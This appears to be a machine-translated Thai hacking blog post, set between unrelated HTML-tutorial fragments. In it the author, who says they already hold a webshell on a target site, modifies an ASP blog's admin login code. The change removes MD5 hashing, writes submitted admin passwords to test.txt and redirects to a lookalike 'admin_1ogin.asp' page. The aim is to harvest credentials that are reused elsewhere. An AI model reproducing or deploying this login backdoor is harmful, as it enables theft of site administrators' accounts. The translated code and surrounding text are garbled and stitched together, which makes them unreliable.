แนะนำ: คอลเลกชันการเขียนรหัส HTML HTML เป็นภาษามาร์กอัปไฮเปอร์เท็กซ์ (HyperTextMarkupLanguage) หรือที่เรียกว่าภาษาเว็บเว็บจำเป็นต้องเข้าใจในหน้าเว็บ แม้ว่าจะมีเครื่องมือมากมายสำหรับการสร้างหน้าเว็บในตอนนี้เช่น Dreamwvear, FrontPage ฯลฯ คุณสามารถสร้างหน้าเว็บที่สวยงามโดยไม่เข้าใจรหัสเหล่านี้ - - เนื่องจากเนื้อหา HTML มีจำนวนมากมีเพียงไม่กี่คนที่เต็มใจเขียนโค้ดเพื่อสร้างหน้าเว็บ (ประสิทธิภาพของ INE) และส่วนใหญ่ใช้
ในการตรวจสอบความปลอดภัยฉันได้รับ webshell จริง ๆ แต่ฉันยังต้องการให้นักสังคมสงเคราะห์มีข้อมูลอื่น ๆ ในที่อยู่อีเมลของเขาดังนั้นฉันต้องรู้นิสัยของเขา
ดาวน์โหลดฐานข้อมูล แต่ไม่สามารถถอดรหัสรหัสผ่าน MD5 ได้ อนิจจาดูเหมือนว่าคุณเพียงแค่บันทึกรหัสผ่านบัญชีผู้ดูแลระบบเข้าสู่ระบบของเขา!
บันทึกปัญหาในการกำจัดปัญหา!
รหัสผ่านนี้มีความสำคัญจริง ๆ แต่ไม่สำคัญ
เพราะหลายคนชอบใช้รหัสผ่านเดียวกัน แม้แต่เครื่องตรวจจับความปลอดภัยอย่างฉันก็ยังเป็นนิสัยในการใช้รหัสผ่านบัญชีเดียวกันอย่างหลีกเลี่ยงไม่ได้
ก่อนอื่นลองดูรหัสเข้าสู่ระบบพื้นหลังของเขา
-
ล็อกอินหรี่
ตั้งค่าเข้าสู่ระบบ = Adlogin ใหม่
เข้าสู่ระบบ Execute
คลาส Adlogin
excommcls ส่วนตัว
คลาสย่อย class_initialize
ตั้งค่า commcls = new CommonCls
Excommcls.isipallow
excommcls.checkinstall
excommcls.getconfigcache (*)
สิ้นสุดย่อย
คลาสย่อย class_terminate
ตั้งค่า excommcls = ไม่มีอะไร
สิ้นสุดย่อย
ดำเนินการย่อยสาธารณะ
การกระทำหรี่
action = คำขอ (การกระทำ)
เลือกการดำเนินการเคส
case checklogin
checklogin
เข้าสู่ระบบกรณี
เข้าสู่ระบบ
กรณีอื่น
เข้าสู่ระบบ
สิ้นสุดเลือก
สิ้นสุดย่อย
checklogin ย่อยส่วนตัว
Dim Adname, ADPWD, CheckCode
adname = excommcls.g (trim (คำขอ (adname))))
ADPWD = MD5 (TRIM (คำขอ (ADPWD))))
checkCode = excommcls.g (คำขอ (CheckCode))
ถ้า TRIM (CheckCode) <> เซสชัน (ExcheckCode) และแอปพลิเคชัน (SN & ISCHECKCODE) = ใช่แล้ว
Excommcls.showmsg รหัสการตรวจสอบไม่ถูกต้อง! , แอปพลิเคชัน (sn & blogurl) & admin_login.asp
ออกจากย่อย
สิ้นสุดถ้า
ถ้า TRIM (ADNAME) = CSTR (แอปพลิเคชัน (SN & ADNAME)) และ TRIM (ADPWD) = CSTR (แอปพลิเคชัน (SN & ADPWD))
Response.Cookies (MD5 (SN)) (ADNAME) = ADNAME
Response.Cookies (MD5 (SN)) (ADPWD) = ADPWD
เซสชัน (Adlogin) = MD5 (SN)
excommcls.getconfigcache (*)
excommcls.getclasscache ()
Response.redirect (แอปพลิเคชัน (SN & Blogurl) & admin_index.asp)
อื่น
บัญชีหรือรหัสผ่าน Excommcls.showmsg ไม่ถูกต้องแอปพลิเคชัน (sn & blogurl) & admin_login.asp
สิ้นสุดถ้า
สิ้นสุดย่อย
เข้าสู่ระบบย่อยส่วนตัว
Response.Cookies (MD5 (SN)) (ADNAME) =
Response.Cookies (MD5 (SN)) (ADPWD) =
session.abandon ()
Excommcls.showmsg ออกจากระบบออกแล้วแอปพลิเคชัน (SN & BlogUrl) และ index.asp ประสบความสำเร็จ
สิ้นสุดย่อย
ล็อกอินย่อยส่วนตัว
-
ดูรหัสต่อไปนี้
adname = excommcls.g (trim (คำขอ (adname))))
ADPWD = MD5 (TRIM (คำขอ (ADPWD))))
--- ความหมายนั้นง่ายมากดังนั้นฉันไม่ได้อธิบายอย่างชัดเจนที่นี่ ส่วนใหญ่ขึ้นอยู่กับ MD5 หากรหัสผ่านถูกเข้ารหัสโดยใช้ MD5 รหัสผ่านที่เราบันทึกไว้จะไร้ประโยชน์และยังคงเป็น MD5 ดังนั้น
ดังนั้นฉันจึงคิดถึงวิธีการตกปลา อินเทอร์เฟซเข้าสู่ระบบดั้งเดิมคือ
checklogin ย่อยส่วนตัว
Dim Adname, ADPWD, CheckCode, StrlogText, IP, FF
adname = excommcls.g (trim (คำขอ (adname))))
ADPWD = (TRIM (คำขอ (ADPWD))))
checkCode = excommcls.g (คำขอ (CheckCode))
strlogfile = test.txt
IP = คำขอ (IP)
strlogtext = strlogtex
ตั้งค่า f = server.createObject (scripting.filesystemobject)
ตั้งค่า ff = f.opentextfile (server.mapath (.) &/& strlogfile, 8, true, 0)
ff.writeline (Chr (13)+Chr (10) & strlogtext)
ff.close
ตั้งค่า ff = ไม่มีอะไร
ตั้งค่า f = ไม่มีอะไร
ถ้า TRIM (CheckCode) <> เซสชัน (ExcheckCode) และแอปพลิเคชัน (SN & ISCHECKCODE) = ใช่แล้ว
Excommcls.showmsg รหัสการตรวจสอบไม่ถูกต้อง! , แอปพลิเคชัน (sn & blogurl) & admin_1ogin.asp
ออกจากย่อย
สิ้นสุดถ้า
ถ้า TRIM (ADNAME) = CSTR (แอปพลิเคชัน (SN & ADNAME)) และ TRIM (ADPWD) = CSTR (แอปพลิเคชัน (SN & ADPWD))
Response.Cookies (MD5 (SN)) (ADNAME) = ADNAME
Response.cookies ((SN)) (ADPWD) = ADPWD
เซสชัน (Adlogin) = MD5 (SN)
excommcls.getconfigcache (*)
excommcls.getclasscache ()
Response.redirect (แอปพลิเคชัน (SN & Blogurl) & admin_1ogin.asp)
อื่น
บัญชีหรือรหัสผ่าน Excommcls.showmsg ไม่ถูกต้องแอปพลิเคชัน (sn & blogurl) & admin_1ogin.asp
สิ้นสุดถ้า
สิ้นสุดย่อย
ดูหรือไม่
A = หน้าเข้าสู่ระบบดั้งเดิมได้ถูกแทนที่ด้วยหน้าฟิชชิ่ง
b = หน้าเข้าสู่ระบบดั้งเดิม (admin_login.asp) ได้รับการแก้ไขเป็น admin_1ogin.asp
ทำไม
ต้นฉบับ: ADPWD = MD5 (TRIM (คำขอ (ADPWD))))
Response.Cookies (MD5 (SN)) (ADPWD) = ADPWD
ปรับปรุงใหม่
ADPWD = (TRIM (คำขอ (ADPWD))))
Response.cookies ((SN)) (ADPWD) = ADPWD
ลบ MD5 - วิธีการที่สับสนนี้ถูกใช้เป็นเวลานาน! - -
ไม่มีเนื้อหาทางเทคนิค ได้โปรดอย่าหัวเราะเยาะฉัน! รหัสผ่านจะถูกบันทึกไว้ใน test.txt
แบ่งปัน: ไฮไลท์ขององค์ประกอบหัว เอกสาร HTML ประกอบด้วยสองส่วน: ส่วนหัว (ส่วนธีมโดยทั่วไปมองไม่เห็น) และร่างกาย (ส่วนของร่างกายที่มองเห็นได้ในเบราว์เซอร์) ด้วยความนิยมของบรรณาธิการเว็บที่มองเห็นได้เช่น FrontPage และ Dreamweaver (DW) จึงไม่ได้เป็นความฝันที่จะสร้างหน้าเว็บระดับมืออาชีพอีกต่อไปโดยไม่ต้องเข้าใจ HTML อย่างไรก็ตามเครื่องมือสร้างโฮมเพจเหล่านี้ไม่สามารถใช้ได้